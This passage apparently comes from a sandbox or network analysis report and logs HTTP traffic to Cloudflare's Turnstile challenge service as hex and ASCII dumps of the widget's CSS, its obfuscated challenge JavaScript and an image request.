#fff; padding: 0; width: 100%; height: 100%; overflow: hidden; line-height: 17px; color: #1d1f20; font-family: -apple-system, system-ui, blinkmacsystemfont,
2024-06-21 15:59:00 UTC	1369	IN	Data Raw: 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 38 70 78 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29 20 62 6f 74 68 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 66 38 66 38 66 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c Data Ascii: splay: flex; margin-right: 8px; border-radius: 50%; box-shadow: inset 0 0 0 #038127; width: 30px; height: 30px; animation: scale-up-center 0.6s cubic-bezier(0.55, 0.085, 0.68, 0.53) both; stroke-width: 6px; stroke: #f8f8f8; stroke-miterl
2024-06-21 15:59:00 UTC	1369	IN	Data Raw: 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 63 62 2d 69 2c 20 2e 74 68 65 6d 65 2d 64 61 72 Data Ascii: ext a:hover,.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus { color: #949494;}.theme-dark .cb-lb .cb-i { border: 2px solid #dadada; background-color: #222;}.theme-dark .cb-lb input:focus ~ .cb-i, .theme-dar
2024-06-21 15:59:00 UTC	1369	IN	Data Raw: 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 0a 2e 74 68 65 Data Ascii: r: #222;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-link,.theme-dark #fr-helper-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited, .theme-dark #fr-helper-link:link,.the
2024-06-21 15:59:00 UTC	1369	IN	Data Raw: 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 64 65 31 33 30 33 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 70 78 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 76 Data Ascii: #challenge-error-text { text-align: center; line-height: 10px; color: #de1303; font-size: 9px;}#challenge-overlay a,#challenge-error-text a { color: #1d1f20;}#challenge-overlay a:visited, #challenge-overlay a:link,#challenge-error-text a:v
2024-06-21 15:59:00 UTC	1369	IN	Data Raw: 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 73 70 61 6e 2e 63 62 2d 6c 62 2d 74 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 20 20 62 61 63 Data Ascii: tion: underline;}.cb-lb input:focus ~ .cb-i { border: 2px solid #c44d0e;}.cb-lb input:focus ~ span.cb-lb-t { text-decoration: underline;}.cb-lb input:checked ~ .cb-i { transform: rotate(0deg) scale(1); opacity: 1; border-radius: 5px; bac
2024-06-21 15:59:00 UTC	1369	IN	Data Raw: 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77 2d 72 65 76 65 72 73 65 20 77 72 61 70 3b 0a 20 20 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 20 31 36 70 78 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 Data Ascii: top: 3px; margin-left: 0;}.size-compact #branding { display: flex; flex-flow: row-reverse wrap; place-content: center flex-start; align-items: center; margin: 5px 16px 0; padding-right: 0; text-align: right;}.size-compact #terms { te
2024-06-21 15:59:00 UTC	1369	IN	Data Raw: 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 66 2d 73 74 61 67 65 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78 Data Ascii: er;}.rtl .size-compact #branding { padding-right: 0; padding-left: 0; text-align: center;}.rtl .size-compact #terms { text-align: center;}.rtl .size-compact #cf-stage { padding-right: 48px;}.rtl .size-compact #success-icon { left: 86px

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:00 UTC	710	OUT	GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=89753409dd24c413 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-21 15:59:00 UTC	331	IN	HTTP/1.1 200 OK Date: Fri, 21 Jun 2024 15:59:00 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 189866 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 8975340e3a4978e7-EWR alt-svc: h3=":443"; ma=86400
2024-06-21 15:59:00 UTC	1038	IN	Data Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 7a 2c 66 46 2c 66 47 2c 66 4e 2c 66 52 2c 66 53 2c 66 54 2c 66 58 2c 66 59 2c 67 31 2c 67 32 2c 67 73 2c 67 7a 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 53 2c 67 54 2c 67 55 2c 67 56 2c 67 57 2c 67 58 2c 67 59 2c 67 5a 2c 68 30 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 37 2c 68 38 2c 68 39 2c 68 61 2c 68 62 2c 68 63 2c 68 64 2c 68 65 2c 68 66 2c 68 67 2c 68 68 2c 68 69 2c 68 6a 2c 68 6b 2c 68 6c 2c 68 6d 2c 68 6e 2c 68 6f 2c 68 70 2c 68 71 2c 68 72 2c 68 73 2c 68 74 2c 68 75 2c 68 76 2c 68 77 2c 68 79 2c Data Ascii: window._cf_chl_opt.uaO=false;~function(iz,fF,fG,fN,fR,fS,fT,fX,fY,g1,g2,gs,gz,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gS,gT,gU,gV,gW,gX,gY,gZ,h0,h1,h2,h3,h4,h5,h6,h7,h8,h9,ha,hb,hc,hd,he,hf,hg,hh,hi,hj,hk,hl,hm,hn,ho,hp,hq,hr,hs,ht,hu,hv,hw,hy,
2024-06-21 15:59:00 UTC	1369	IN	Data Raw: 28 6c 2c 6d 2c 6a 37 2c 6e 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 29 7b 69 66 28 6a 37 3d 6a 36 2c 6e 3d 7b 7d 2c 6e 5b 6a 37 28 32 31 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 76 2c 42 29 7b 72 65 74 75 72 6e 20 76 7c 7c 42 7d 2c 6e 5b 6a 37 28 33 34 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 76 2c 42 29 7b 72 65 74 75 72 6e 20 76 2b 42 7d 2c 6e 5b 6a 37 28 31 34 37 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 76 2c 42 29 7b 72 65 74 75 72 6e 20 76 2b 42 7d 2c 6e 5b 6a 37 28 31 32 32 31 29 5d 3d 66 5b 6a 37 28 34 33 34 29 5d 2c 6e 5b 6a 37 28 36 33 38 29 5d 3d 66 5b 6a 37 28 32 37 30 29 5d 2c 73 3d 6e 2c 66 5b 6a 37 28 31 34 39 33 29 5d 21 3d 3d 6a 37 28 31 31 38 34 29 29 7b 69 66 28 78 3d 73 5b 6a 37 28 32 31 35 29 5d 28 68 2c 6a 37 28 38 36 36 29 29 Data Ascii: (l,m,j7,n,s,x,B,C,D,E,F,G,H){if(j7=j6,n={},n[j7(215)]=function(v,B){return v\|\|B},n[j7(342)]=function(v,B){return v+B},n[j7(1474)]=function(v,B){return v+B},n[j7(1221)]=f[j7(434)],n[j7(638)]=f[j7(270)],s=n,f[j7(1493)]!==j7(1184)){if(x=s[j7(215)](h,j7(866))
2024-06-21 15:59:00 UTC	1369	IN	Data Raw: 6a 63 28 31 30 31 37 29 5d 28 68 29 29 29 2c 78 3d 67 5b 6a 63 28 31 39 32 29 5d 5b 6a 63 28 37 31 30 29 5d 26 26 67 5b 6a 63 28 32 30 34 34 29 5d 3f 67 5b 6a 63 28 31 39 32 29 5d 5b 6a 63 28 37 31 30 29 5d 28 6e 65 77 20 67 5b 28 6a 63 28 32 30 34 34 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 6a 64 2c 48 29 7b 66 6f 72 28 6a 64 3d 6a 63 2c 47 5b 6a 64 28 34 33 32 29 5d 28 29 2c 48 3d 30 3b 48 3c 47 5b 6a 64 28 31 32 37 39 29 5d 3b 6f 5b 6a 64 28 33 33 36 29 5d 28 47 5b 48 5d 2c 47 5b 48 2b 31 5d 29 3f 47 5b 6a 64 28 31 33 38 31 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 6a 63 28 31 36 35 34 29 5d 5b 6a 63 28 36 36 37 Data Ascii: jc(1017)](h))),x=g[jc(192)][jc(710)]&&g[jc(2044)]?g[jc(192)][jc(710)](new g[(jc(2044))](x)):function(G,jd,H){for(jd=jc,G[jd(432)](),H=0;H<G[jd(1279)];o[jd(336)](G[H],G[H+1])?G[jd(1381)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),B=B[jc(1654)][jc(667
2024-06-21 15:59:00 UTC	1369	IN	Data Raw: 3c 69 7d 2c 27 53 68 46 56 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 71 52 56 75 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 66 51 4f 70 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 6d 50 6a 50 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 4b 4e 59 62 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 53 53 63 52 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 44 4c 6a 76 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 72 6b 63 59 79 27 3a 66 75 Data Ascii: <i},'ShFVV':function(h,i){return h>i},'qRVuQ':function(h,i){return h<i},'fQOpo':function(h,i){return i==h},'mPjPR':function(h,i){return i\|h},'KNYbb':function(h,i){return h<i},'SScRF':function(h,i){return h(i)},'DLjvl':function(h,i){return h<<i},'rkcYy':fu
2024-06-21 15:59:00 UTC	1369	IN	Data Raw: 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 64 5b 6a 4d 28 31 32 30 38 29 5d 28 4a 2c 69 5b 6a 4d 28 31 32 37 39 29 5d 29 3b 4a 2b 3d 31 29 69 66 28 4b 3d 69 5b 6a 4d 28 35 30 30 29 5d 28 4a 29 2c 4f 62 6a 65 63 74 5b 6a 4d 28 39 30 32 29 5d 5b 6a 4d 28 31 36 31 31 29 5d 5b 6a 4d 28 37 33 37 29 5d 28 78 2c 4b 29 7c 7c 28 78 5b 4b 5d 3d 45 2b 2b 2c 42 5b 4b 5d 3d 21 30 29 2c 4c 3d 43 2b 4b 2c 4f 62 6a 65 63 74 5b 6a 4d 28 39 30 32 29 5d 5b 6a 4d 28 31 36 31 31 29 5d 5b 6a 4d 28 37 33 37 29 5d 28 78 2c 4c 29 29 43 3d 4c 3b 65 6c 73 65 20 66 6f 72 28 4d 3d 6a 4d 28 32 39 32 29 5b 6a 4d 28 31 30 32 39 29 5d 28 27 7c 27 29 2c 4e 3d 30 3b 21 21 5b 5d Data Ascii: n'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;d[jM(1208)](J,i[jM(1279)]);J+=1)if(K=i[jM(500)](J),Object[jM(902)][jM(1611)][jM(737)](x,K)\|\|(x[K]=E++,B[K]=!0),L=C+K,Object[jM(902)][jM(1611)][jM(737)](x,L))C=L;else for(M=jM(292)[jM(1029)]('\|'),N=0;!![]
2024-06-21 15:59:00 UTC	1369	IN	Data Raw: 31 29 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 6a 4d 28 31 34 35 30 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4f 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 6a 4d 28 31 37 38 38 29 5d 28 48 3c 3c 31 2e 30 35 2c 4f 29 2c 64 5b 6a 4d 28 31 30 30 32 29 5d 28 49 2c 64 5b 6a 4d 28 31 39 30 34 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 6a 4d 28 31 34 35 30 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 6a 4d 28 31 30 39 33 29 5d 28 30 29 2c 73 3d 30 3b 31 36 3e 73 3b 48 3d 48 3c 3c 31 2e 33 31 7c 4f 26 31 2c 49 3d 3d 64 5b 6a 4d 28 38 31 30 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 6a 4d 28 31 34 35 30 29 5d 28 6f Data Ascii: 1)),j-1==I?(I=0,G[jM(1450)](o(H)),H=0):I++,O>>=1,s++);}else{for(O=1,s=0;s<F;H=d[jM(1788)](H<<1.05,O),d[jM(1002)](I,d[jM(1904)](j,1))?(I=0,G[jM(1450)](o(H)),H=0):I++,O=0,s++);for(O=C[jM(1093)](0),s=0;16>s;H=H<<1.31\|O&1,I==d[jM(810)](j,1)?(I=0,G[jM(1450)](o
2024-06-21 15:59:00 UTC	1369	IN	Data Raw: 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4d 2c 44 5b 6a 50 28 31 34 35 30 29 5d 28 4d 29 3b 3b 29 69 66 28 64 5b 6a 50 28 31 35 33 30 29 5d 28 6a 50 28 32 34 31 29 2c 64 5b 6a 50 28 31 33 36 34 29 5d 29 29 72 65 74 75 72 6e 20 6a 50 28 37 33 32 29 3b 65 6c 73 65 7b 69 66 28 64 5b 6a 50 28 31 30 30 38 29 5d 28 49 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 6a 50 28 31 31 37 39 29 5d 28 32 2c 43 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 64 5b 6a 50 28 39 33 37 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 46 2a 28 30 3c 4c 3f 31 3a 30 29 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4d 3d 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d Data Ascii: n''}for(E=s[3]=M,D[jP(1450)](M);;)if(d[jP(1530)](jP(241),d[jP(1364)]))return jP(732);else{if(d[jP(1008)](I,i))return'';for(J=0,K=Math[jP(1179)](2,C),F=1;K!=F;L=d[jP(937)](G,H),H>>=1,H==0&&(H=j,G=o(I++)),J\|=F*(0<L?1:0),F<<=1);switch(M=J){case 0:for(J=0,K=M
2024-06-21 15:59:00 UTC	1369	IN	Data Raw: 6b 31 28 31 35 36 31 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 66 46 5b 6b 31 28 31 38 36 32 29 5d 5b 6b 31 28 31 32 36 32 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 66 46 5b 6b 31 28 31 38 36 32 29 5d 5b 6b 31 28 31 35 34 32 29 5d 2c 27 63 6f 64 65 27 3a 6b 31 28 36 35 36 29 2c 27 72 63 56 27 3a 66 46 5b 6b 31 28 31 38 36 32 29 5d 5b 6b 31 28 31 37 34 30 29 5d 7d 2c 27 2a 27 29 29 3a 28 67 3d 66 5b 6b 31 28 31 39 36 39 29 5d 28 67 29 2c 67 26 26 63 5b 6b 31 28 31 36 35 38 29 5d 28 69 2c 67 29 29 29 7d 2c 65 29 7d 2c 66 46 5b 69 7a 28 31 37 32 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 6b 32 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 29 7b 6a 3d 28 6b 32 3d 69 7a 2c 69 3d 7b 7d 2c 69 5b 6b 32 28 31 36 30 35 29 5d 3d 6b 32 28 Data Ascii: k1(1561),'cfChlOut':fF[k1(1862)][k1(1262)],'cfChlOutS':fF[k1(1862)][k1(1542)],'code':k1(656),'rcV':fF[k1(1862)][k1(1740)]},'*')):(g=f[k1(1969)](g),g&&c[k1(1658)](i,g)))},e)},fF[iz(1728)]=function(f,g,h,k2,i,j,k,l,m,n,o,s,x,B){j=(k2=iz,i={},i[k2(1605)]=k2(
2024-06-21 15:59:00 UTC	1369	IN	Data Raw: 28 5b 6b 35 28 38 32 31 29 5d 2c 6f 29 29 2c 43 3d 6e 65 77 20 6f 28 73 29 2c 73 5b 6b 35 28 31 35 34 39 29 5d 28 73 29 2c 43 5b 6b 35 28 34 31 30 29 5d 28 29 7d 63 61 74 63 68 28 44 29 7b 72 65 74 75 72 6e 21 21 5b 5d 7d 69 66 28 21 6c 5b 6b 35 28 31 31 30 30 29 5d 29 72 65 74 75 72 6e 21 21 5b 5d 7d 65 6c 73 65 20 66 46 5b 6b 35 28 31 37 32 38 29 5d 28 6d 2c 75 6e 64 65 66 69 6e 65 64 2c 6b 35 28 31 36 31 32 29 29 7d 2c 31 30 29 2c 66 46 5b 6b 33 28 31 38 39 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6b 36 29 7b 6b 36 3d 6b 33 2c 66 46 5b 6b 36 28 31 34 30 35 29 5d 28 29 7d 2c 31 65 33 29 2c 66 46 5b 6b 33 28 36 35 32 29 5d 5b 6b 33 28 37 37 30 29 5d 28 6b 33 28 34 32 36 29 2c 6d 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 67 7a 3d 7b 7d 2c 67 7a 5b 69 7a 28 37 Data Ascii: ([k5(821)],o)),C=new o(s),s[k5(1549)](s),C[k5(410)]()}catch(D){return!![]}if(!l[k5(1100)])return!![]}else fF[k5(1728)](m,undefined,k5(1612))},10),fF[k3(189)](function(k6){k6=k3,fF[k6(1405)]()},1e3),fF[k3(652)][k3(770)](k3(426),m));return![]},gz={},gz[iz(7
2024-06-21 15:59:00 UTC	1369	IN	Data Raw: 67 45 3d 7b 7d 2c 67 45 5b 69 7a 28 31 35 34 31 29 5d 3d 69 7a 28 34 38 36 29 2c 67 45 5b 69 7a 28 38 34 30 29 5d 3d 69 7a 28 33 30 30 29 2c 67 45 5b 69 7a 28 38 30 32 29 5d 3d 69 7a 28 34 36 34 29 2c 67 45 5b 69 7a 28 36 35 37 29 5d 3d 69 7a 28 36 38 35 29 2c 67 45 5b 69 7a 28 31 32 38 37 29 5d 3d 69 7a 28 37 38 30 29 2c 67 45 5b 69 7a 28 31 33 33 31 29 5d 3d 69 7a 28 31 39 38 34 29 2c 67 45 5b 69 7a 28 37 39 33 29 5d 3d 69 7a 28 31 31 37 36 29 2c 67 45 5b 69 7a 28 39 36 33 29 5d 3d 69 7a 28 34 38 38 29 2c 67 45 5b 69 7a 28 34 37 34 29 5d 3d 69 7a 28 35 37 36 29 2c 67 45 5b 69 7a 28 31 36 35 29 5d 3d 69 7a 28 38 35 35 29 2c 67 45 5b 69 7a 28 32 35 36 29 5d 3d 69 7a 28 31 33 36 39 29 2c 67 45 5b 69 7a 28 31 33 32 34 29 5d 3d 69 7a 28 32 30 32 37 29 2c 67 Data Ascii: gE={},gE[iz(1541)]=iz(486),gE[iz(840)]=iz(300),gE[iz(802)]=iz(464),gE[iz(657)]=iz(685),gE[iz(1287)]=iz(780),gE[iz(1331)]=iz(1984),gE[iz(793)]=iz(1176),gE[iz(963)]=iz(488),gE[iz(474)]=iz(576),gE[iz(165)]=iz(855),gE[iz(256)]=iz(1369),gE[iz(1324)]=iz(2027),g

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:00 UTC	785	OUT	GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normal Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-21 15:59:01 UTC	240	IN	HTTP/1.1 200 OK Date: Fri, 21 Jun 2024 15:59:01 GMT Content-Type: image/png Content-Length: 61 Connection: close cache-control: max-age=2629800, public Server: cloudflare CF-RAY: 897534103a4d8c6b-EWR alt-svc: h3=":443"; ma=86400
